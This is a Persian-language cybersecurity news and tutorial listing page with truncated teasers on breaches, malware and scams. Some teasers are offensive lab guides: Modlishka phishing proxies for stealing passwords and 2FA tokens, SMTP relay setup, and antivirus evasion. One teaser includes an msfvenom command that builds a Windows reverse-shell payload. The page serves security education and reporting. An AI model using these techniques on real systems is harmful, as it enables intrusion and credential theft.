یییی اسلاید
-
اجرای حملات فیشینگ از طریق پروکسی معکوس HTTP با بهرهگیری از ابزار Modlishka
این آزمایشگاه نشان میدهد چگونه میتوان یک پروکسی معکوس HTTP بهنام Modlishka راهاندازی کرد که در کارزارهای فیشینگ برای سرقت گذرواژهها و توکنهای احراز هویت دومرحلهای (۲FA) کاربران مورد استفاده قرار میگیرد. ابزار Modlishka این امکان را فراهم میسازد، زیرا بهعنوان یک عامل مرد میانی (MITM) میان کاربر قربانی و وبسایتی که مهاجم در حال جعل هویت آن است قرار…
بیشتر بخوانید » -
راه اندازی سرورهای واسط و انتقالدهنده ایمیل SMTP Forwarders / Relays
راهاندازی سرور Relay Mail Server قرار است یک سرور ایمیل راهاندازی کنیم که در ادامه، بهعنوان یک سرور SMTP relay مورد استفاده قرار خواهد گرفت. در اولین گام، یک droplet (سرور مجازی) جدید با سیستمعامل Ubuntu در پلتفرم DigitalOcean ایجاد شد. نصب Postfix بهعنوان MTA روی droplet apt-get install postfix در طول نصب Postfix، دامنهی nodspot.com را بهعنوان نام ایمیل…
بیشتر بخوانید » -
یک پکیج مخرب PyPi بدافزار RAT را پنهان کرده و از سال ۲۰۲۲ توسعهدهندگان Discord را هدف قرار داده است.
یک بسته پایتون مخرب که توسعهدهندگان دیسکورد را هدف قرار میدهد و حاوی بدافزار RAT (تروجان دسترسی از راه دور) است، پس از بیش از سه سال در شاخص بسته پایتون (PyPI) مشاهده شد. بستهای به نام ‘discordpydebug’ که خود را به عنوان ابزاری برای ثبت خطاهای توسعهدهندگان رباتهای دیسکورد معرفی میکرد، از زمان بارگذاری آن در تاریخ ۲۱ مارس…
بیشتر بخوانید » -
شرکت Ascension اعلام کرد که نفوذ اطلاعاتی اخیر، بیش از ۴۳۰ هزار بیمار را تحت تأثیر قرار داده است.
شرکت Ascension، یکی از بزرگترین سامانههای خصوصی خدمات درمانی در ایالات متحده، اعلام کرده است که اطلاعات شخصی و درمانی بیش از ۴۳۰ هزار بیمار در جریان یک نقض داده که ماه گذشته فاش شد، در معرض افشا قرار گرفته است. براساس آنچه شرکت Ascension در نامههای اطلاعرسانی مربوط به نقض دادهها که در ماه آوریل برای افراد آسیبدیده ارسال…
بیشتر بخوانید » -
روشهای عبور از آنتیویروس با بهرهگیری از قالبهای آماده Metasploit و ساخت فایلهای اجرایی سفارشی
در اینجا نگاهی سریع داریم به چند روش ساده برای عبور از شناسایی آنتیویروسها هنگام استفاده از شلکدها. ۴۸ مورد شناسایی از بین ۶۸ آنتیویروس برای تست اولیه، یک پیلود Reverse Shell استاندارد با استفاده از Metasploit برای سیستمهای ۳۲ بیتی ویندوز تولید میکنیم. msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.5 LPORT=443 -f exe > /root/tools/av.exe با بررسی این فایل در سرویس VirusTotal،…
بیشتر بخوانید » -
Google Chrome از هوش مصنوعی داخلی دستگاه برای شناسایی کلاهبرداریهای پشتیبانی فنی استفاده خواهد کرد
Google در حال افزودن یک قابلیت امنیتی جدید به مرورگر Chrome است که با استفاده از مدل زبانی بزرگ داخلی موسوم به ‘Gemini Nano’، کلاهبرداریهای پشتیبانی فنی را هنگام وبگردی شناسایی و مسدود میکند. کلاهبرداریهای پشتیبانی فنی، وبسایتهای مخربی هستند که کاربران را فریب میدهند تا تصور کنند رایانهشان به ویروس آلوده شده یا دچار مشکلی دیگر است. این هشدارها…
بیشتر بخوانید » -
هکرهای گروه Luna Moth با جعل هویت تیم پشتیبانی فناوری اطلاعات، به شرکتهای آمریکایی حمله کرده و اقدام به اخاذی میکنند.
گروه هکری Luna Moth، که با نام Silent Ransom Group نیز شناخته میشود، حملات فیشینگ از نوع تماس تلفنی را علیه شرکتهای حقوقی و مالی در آمریکا افزایش داده است. گروه هکری Luna Moth، معروف به Silent Ransom Group، پیشتر با اجرای کمپینهای BazarCall موفق به نفوذ اولیه به شبکه شرکتها شده و پس از آن، باجافزارهای Ryuk و Conti…
بیشتر بخوانید » -
آموزش جامع ابزار Feroxbuster
Feroxbusterیک ابزار قدرتمند است که برای شناسایی دایرکتوریها (پوشهها) و فایلها روی سرورهای وب با استفاده از تکنیکهای حمله Brute-force طراحی شده است. این ابزار معمولاً در تست نفوذ و ارزیابیهای امنیتی برای شناسایی مسیرها و منابع پنهانشده مورد استفاده قرار میگیرد. در اینجا قصد داریم درباره وظایف و کارهای مختلفی که با استفاده از Feroxbuster میتوان انجام داد، صحبت…
بیشتر بخوانید » -
بدافزار StealC با ارتقاء قابلیتهای پنهانکاری و تجهیز به ابزارهای سرقت اطلاعات، پیشرفتهتر شده است.
سازندگان StealC، بدافزار پرکاربردی که برای سرقت اطلاعات و دانلود سایر بدافزارها به کار میرود، نسخه دوم و اصلی آن را منتشر کردهاند؛ نسخهای که شامل ارتقاءهای متعدد در حوزه پنهانکاری و قابلیتهای سرقت داده است. نسخه جدید ابزار مخرب StealC در ماه مارس ۲۰۲۵ در اختیار مجرمان سایبری قرار گرفته، اما پژوهشگران شرکت امنیتی Zscaler بهتازگی با تحلیل این…
بیشتر بخوانید » -
شش نفر به خاطر راهاندازی کلاهبرداریهای سرمایهگذاری با کمک هوش مصنوعی، که باعث دزدیدن ۲۰ میلیون دلار شد، بازداشت شدند.
پلیس اسپانیا شش نفر را که پشت یک کلاهبرداری گسترده در زمینه سرمایهگذاری رمزارز بودند، دستگیر کرد؛ این کلاهبرداری از ابزارهای هوش مصنوعی برای ساخت تبلیغات دیپفیک (جعلی) با حضور چهرههای مشهور استفاده میکرد تا مردم را فریب دهد. این کلاهبرداری بسیار موفق بود و توانست ۱۹ میلیون یورو (۲۰.۹ میلیون دلار) از ۲۰۸ قربانی در سراسر جهان کلاهبرداری کند.…
بیشتر بخوانید »
